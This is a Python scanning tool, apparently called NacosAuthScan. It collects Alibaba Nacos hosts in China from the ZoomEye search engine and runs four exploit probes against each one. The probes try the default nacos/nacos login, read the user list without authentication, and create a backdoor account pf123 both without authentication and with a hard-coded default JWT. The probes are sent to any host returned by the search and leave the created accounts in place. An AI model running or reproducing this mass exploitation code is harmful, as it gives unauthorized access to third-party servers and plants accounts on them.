# -*- coding: utf-8 -*-
# @Time : 2023/7/21 16:49
# @Author : PFinal南丞 <[email protected]
# @File : scan.py
# @Software: PyCharm
import os
import threading

import fire
import requests
import urllib3
import zoomeye.sdk as zoomeye
from colorama import Fore
# Suppress urllib3 warnings for the whole process. This includes the
# InsecureRequestWarning that would otherwise be emitted for every request the
# checks below make with verify=False.
urllib3.disable_warnings()
# ANSI escape sequences used to colour the start-up banner.
yellow = '\033[01;33m'
white = '\033[01;37m'
green = '\033[01;32m'
blue = '\033[01;34m'
red = '\033[1;31m'
end = '\033[0m'
version = 'v0.1'
# Version tag shown in the banner: the version string wrapped in braces,
# followed by " #dev", with colour codes interleaved.
message = white + '{' + red + version + ' #dev' + white + '}'
# Banner printed once by the __main__ guard. The text is whitespace-sensitive
# ASCII art, so the literal is kept exactly as it is.
nacos_scan_banner = f"""
{yellow} NacosAuthScan is a tool to Scan for unauthorized {yellow}
_ _ _ _ _____
| \ | | /\ | | | | / ____| {message}{green}
| \| | __ _ ___ ___ ___ / \ _ _| |_| |__ | (___ ___ __ _ _ __ {blue}
| . ` |/ _` |/ __/ _ \/ __| / /\ \| | | | __| '_ \ \___ \ / __/ _` | '_ \ {blue}
| |\ | (_| | (_| (_) \__ \/ ____ \ |_| | |_| | | |____) | (_| (_| | | | | {green}
|_| \_|\__,_|\___\___/|___/_/ \_\__,_|\__|_| |_|_____/ \___\__,_|_| |_| {white}PFinal南丞{white}
{red}NacosAuthScan is under development, please update before each use!{end}
"""
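# ZoomEye client used by ZScan.get_goal_from_zoom. The API key is taken from
# the ZOOMEYE_API_KEY environment variable so that a real key never has to be
# written into (and committed with) this file; the original placeholder is
# kept as the fallback, so behaviour is unchanged when the variable is unset.
zm = zoomeye.ZoomEye(
    api_key=os.environ.get(
        "ZOOMEYE_API_KEY", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    )
)
# Module-level list of {'ip': ..., 'port': ...} dicts. It is filled by
# ZScan.get_goal_from_zoom and read by ZScan.scan_goal_from_queue.
data_queue = []
# Headers sent with every request the checks make. The User-Agent is a fixed
# string, so the same value appears in the access log of each host contacted.
head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}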
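def poc1(url):
    """Check whether the login endpoint accepts the default nacos/nacos account.

    Posts the default credentials to ``/nacos/v1/auth/users/login`` under
    *url* and prints one coloured result line. Nothing is returned.

    Args:
        url: Base URL of the server, with or without a trailing slash.
    """
    # Strip trailing slashes so exactly one slash joins the base and the path.
    target = url.rstrip("/") + "/nacos/v1/auth/users/login"
    data = {
        "username": "nacos",
        "password": "nacos"
    }
    try:
        # verify=False: the server certificate is not validated.
        # The timeout keeps an unresponsive host from blocking the calling
        # thread indefinitely (requests has no default timeout).
        checkpoc1 = requests.post(url=target, headers=head, data=data,
                                  verify=False, timeout=10)
    except requests.RequestException as exc:
        # Connection errors and timeouts are reported instead of escaping as
        # an unhandled exception in the worker thread.
        print(Fore.RED + f"[!] {url} request failed: {exc}\n")
        return
    # Only the status code is inspected: any HTTP 200 counts as a successful
    # login, so a host answering 200 to every path is reported as a hit too.
    if checkpoc1.status_code == 200:
        print(Fore.GREEN + f"[+] {url} 存在默认口令nacos\n")
    else:
        print(Fore.RED + f"[-] {url} 不存在默认口令\n")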
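def poc2(url):
    """Check whether the user list can be read without authentication.

    Requests ``/nacos/v1/auth/users?pageNo=1&pageSize=5`` under *url* with no
    credentials and prints one coloured result line. Nothing is returned.

    Args:
        url: Base URL of the server, with or without a trailing slash.
    """
    # Strip trailing slashes so exactly one slash joins the base and the path.
    target = url.rstrip("/") + "/nacos/v1/auth/users?pageNo=1&pageSize=5"
    try:
        # verify=False: the server certificate is not validated.
        # The timeout keeps an unresponsive host from blocking the calling
        # thread indefinitely (requests has no default timeout).
        checkpoc2 = requests.get(url=target, headers=head, verify=False,
                                 timeout=10)
    except requests.RequestException as exc:
        print(Fore.RED + f"[!] {url} request failed: {exc}\n")
        return
    # The match is a plain substring test on the body and ignores the status
    # code, so any page containing the word "username" (a login form, an
    # error page) is reported as a hit; positives need manual confirmation.
    if "username" in checkpoc2.text:
        print(Fore.GREEN + f"[+] 存在未授权访问漏洞,你可访问 {target} 查看详细信息\n")
    else:
        print(Fore.RED + f"[-] {url} 不存在未授权访问漏洞\n")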
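def poc3(url):
    """Check whether a user can be created without authentication.

    Posts a fixed username/password pair to ``/nacos/v1/auth/users`` under
    *url* and prints one coloured result line. Nothing is returned.

    This check changes state: where it succeeds, the account ``pf123`` with
    the password shown in the output exists on the server afterwards. The
    function does not delete it, so it has to be removed once the finding is
    confirmed.

    Args:
        url: Base URL of the server, with or without a trailing slash.
    """
    # Strip trailing slashes so exactly one slash joins the base and the path.
    target = url.rstrip("/") + "/nacos/v1/auth/users"
    data = {
        "username": "pf123",
        "password": "pf123"
    }
    try:
        # verify=False: the server certificate is not validated.
        # The timeout keeps an unresponsive host from blocking the calling
        # thread indefinitely (requests has no default timeout).
        checkpoc3 = requests.post(url=target, headers=head, data=data,
                                  verify=False, timeout=10)
    except requests.RequestException as exc:
        print(Fore.RED + f"[!] {url} request failed: {exc}\n")
        return
    # Success is recognised by the literal confirmation text in the body.
    if "create user ok" in checkpoc3.text:
        print(Fore.GREEN + f"[+] {url} 存在任意用户添加漏洞 【用户:pf123 密码为:pf123】 \n")
    else:
        print(Fore.RED + f"[-] {url} 不存在任意用户添加漏洞\n")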
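def poc4(url):
    """Check whether a user can be created with the embedded access token.

    Posts a fixed username/password pair to ``/nacos/v1/auth/users`` under
    *url*, passing a hard-coded JWT as the ``accessToken`` query parameter,
    and prints one coloured result line. Nothing is returned.

    This check changes state: where it succeeds, the account ``pf123`` with
    the password shown in the output exists on the server afterwards. The
    function does not delete it, so it has to be removed once the finding is
    confirmed.

    Args:
        url: Base URL of the server, with or without a trailing slash.
    """
    # The token literal is written once instead of once per branch.
    # NOTE(review): its payload segment decodes to sub=nacos with
    # exp=1679085875 (March 2023). A server that enforces expiry would reject
    # it whatever signing key it uses, so a negative result here is not
    # evidence that the signing key was changed; confirm against the server's
    # own configuration.
    access_token = (
        "eyJhbGciOiJIUzI1NiJ9."
        "eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0."
        "WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc"
    )
    # Strip trailing slashes so exactly one slash joins the base and the path.
    target = url.rstrip("/") + "/nacos/v1/auth/users?accessToken=" + access_token
    data = {
        "username": "pf123",
        "password": "pf123"
    }
    try:
        # verify=False: the server certificate is not validated.
        # The timeout keeps an unresponsive host from blocking the calling
        # thread indefinitely (requests has no default timeout).
        checkpoc4 = requests.post(url=target, headers=head, data=data,
                                  verify=False, timeout=10)
    except requests.RequestException as exc:
        print(Fore.RED + f"[!] {url} request failed: {exc}\n")
        return
    # Success is recognised by the literal confirmation text in the body.
    if "create user ok" in checkpoc4.text:
        print(Fore.GREEN + f"[+] {url} 存在任意用户添加漏洞 【用户:pf123 密码为:pf123】添加成功\n")
    else:
        print(Fore.RED + f"[-] {url} 不存在默认JWT任意用户添加漏洞\n")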
def send_request(ip_info):
    """Build the base URL for one queued host and run all four checks on it.

    Args:
        ip_info: Mapping with an ``'ip'`` entry and a ``'port'`` entry. The
            port is compared with the string ``'443'``, so an integer 443
            does not select https.
    """
    port = ip_info.get('port')
    host_and_port = ip_info.get('ip') + ':' + str(port)
    # Only port 443 is treated as TLS; every other port is probed over http.
    scheme = 'https://' if port == '443' else 'http://'
    detail_url = scheme + host_and_port
    # The checks run in order. poc3 and poc4 are state-changing: each tries to
    # create an account on the host.
    for check in (poc1, poc2, poc3, poc4):
        check(detail_url)
class ZScan:
    """Collect hosts from ZoomEye and run the checks against each of them."""

    def __init__(self):
        # Not read anywhere in this file; both methods work on the
        # module-level data_queue instead.
        self.queue = None

    @staticmethod
    def get_goal_from_zoom() -> None:
        """Fill data_queue with the ip/port pairs ZoomEye returns.

        Runs the fixed query on result page 1 and appends one
        ``{'ip': ..., 'port': ...}`` dict per result. Any exception is
        printed and otherwise ignored, leaving the queue with whatever was
        appended before the failure.

        NOTE(review): the queue holds whatever the search index returns for
        the query; nothing here restricts it to an allow-list of hosts before
        scan_goal_from_queue runs the checks against every entry.
        """
        first_page = 1
        try:
            zm.dork_search('app:"Alibaba Nacos" +country:"CN"', first_page)
            for row in zm.dork_filter("ip,port"):
                # Both fields are stored as strings; send_request compares the
                # port with the string '443'.
                data_queue.append(dict(ip=str(row[0]), port=str(row[1])))
        except Exception as e:
            print(e)

    @staticmethod
    def scan_goal_from_queue():
        """Run send_request for every queued host, one thread per host.

        Returns only after every thread has finished.
        """
        workers = []
        for target in data_queue:
            worker = threading.Thread(target=send_request, args=(target,))
            workers.append(worker)
            worker.start()
        # Wait for all threads to complete.
        for worker in workers:
            worker.join()
def run_scan(action='-z', **kwargs):
    """Dispatch a command-line action.

    Args:
        action: ``'-z'`` (the default) collects hosts from ZoomEye and then
            runs the checks against them. Any other value does nothing.
        **kwargs: Accepted and ignored.
    """
    if action != '-z':
        return
    scanner = ZScan()
    scanner.get_goal_from_zoom()
    scanner.scan_goal_from_queue()
if __name__ == "__main__":
    # Print the banner, then let python-fire map the command-line arguments
    # onto run_scan's parameters.
    print(nacos_scan_banner)
    fire.Fire(run_scan)